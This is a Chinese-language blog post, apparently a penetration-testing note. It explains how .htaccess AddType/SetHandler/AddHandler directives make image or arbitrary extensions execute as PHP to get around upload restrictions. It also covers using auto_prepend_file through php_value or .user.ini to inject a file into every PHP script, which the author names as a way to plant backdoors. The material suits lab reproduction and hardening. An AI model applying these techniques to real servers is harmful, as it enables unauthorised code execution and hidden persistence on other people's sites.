通过向.htaccess文件添加AddType或AddHandler使非php文件被解析
介绍
除了正常的用途外,在渗透中的Apache环境下,可以用.htaccess来重写Apache配置以绕过上传,或者留后门什么的。
条件
一般网上复现给出的条件是
- httpd.conf中
AllowOverride All
(文件中可能有多处,仅改DocumentRoot指向我们文件的即可) - 开启mod_rewrite.so模块,这个一般是默认开启的。
以上两处都是服务端配置,实际上实战场景,我们也改不了。但本地复现的时候可能会遇到这个问题。
接下来给出的.htaccess写法都类似于
AddType application/x-httpd-php .jpg
亦或者是
SetHandler application/x-httpd-php
但这两种写法其实都没有本质的区别。
在Apache模块DLL模式下,应该是能成功的。
但是如果你使用的是PHPStudy在windows下面,可能会有复现失败的情况。这是因为PHPStudy在大部分情况(我遇到的)下,使用的是CGI/FastCGI模式。
解决方法
以后缀名abc为例,路径自行进行替换。(经测试更改.htaccess是可以不重启服务器的)
AddHandler fcgid-script .abc
FcgidWrapper "D:/phpstudy_pro/Extensions/php/php7.3.4nts/php-cgi.exe" .abc
这里将AddHandler替换为SetHandler也是可以的。
这个写法,参考了vhosts.conf
或者Apache2.4.39\conf\vhosts\localhost_80.conf
这里。
也就给我们拓宽了思路,如果我们自己的.htaccess失效。可以参考默认生成的配置文件是如何对php进行解析的。
DocumentRoot "D:/phpstudy_pro/WWW/localhost"
FcgidInitialEnv PHPRC "D:/phpstudy_pro/Extensions/php/php7.3.4nts"
AddHandler fcgid-script .php
FcgidWrapper "D:/phpstudy_pro/Extensions/php/php7.3.4nts/php-cgi.exe" .php
ErrorLog "D:/phpstudy_pro/Extensions/Apache2.4.39/logs/localhost_error.log"
CustomLog "D:/phpstudy_pro/Extensions/Apache2.4.39/logs/localhost_acess.log" common
Options FollowSymLinks ExecCGI
AllowOverride All
Order allow,deny
Allow from all
Require all granted
DirectoryIndex index.php index.html
ErrorDocument 400 /error/400.html
ErrorDocument 403 /error/403.html
ErrorDocument 404 /error/404.html
ErrorDocument 500 /error/500.html
ErrorDocument 501 /error/501.html
ErrorDocument 502 /error/502.html
ErrorDocument 503 /error/503.html
ErrorDocument 504 /error/504.html
ErrorDocument 505 /error/505.html
ErrorDocument 506 /error/506.html
ErrorDocument 507 /error/507.html
ErrorDocument 510 /error/510.html
.htaccess中添加php_value auto_append_file导致500错误
介绍
.htaccess中除了上面的添加文件的php解析以外。还可以通过添加auto_append_file
或auto_prepend_file
向所有php文件中的开头或最后插入指定的文件内容。可以用来制作后门。具体可自行百度。
复现方式
网上给出的方法一般是在.htaccess中添加如下代码
php_value auto_prepend_file "/home/fdipzone/header.php"
php_value auto_append_file "/home/fdipzone/footer.php"
但是如果运行在CGI模式下,这个php_value是不能被识别的,会导致服务器500错误。
解决方案
1. 通过.user.ini来实现
可以通过 .user.ini 来设置auto_append_file、auto_prepend_file。来添加后门。
自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGI SAPI 处理
在目录下创建.user.ini
文件。内容如下:
auto_prepend_file = 123.gif
123.gif自行替换为需要引入的文件。可以是.user.in
的相对路径。
其他还有
参考链接
Using .htaccess to make all .html pages to run as .php files?
Apache下PHP的几种工作方式
Apache 中文文档
Apache 2.4 官方文档
第二部分的参考链接
Nginx 设置 PHP_VALUE 的灵异问题
Unable to set php_value in .htaccess file
我的博客即将同步至腾讯云+社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=2cwj8l6bjwe84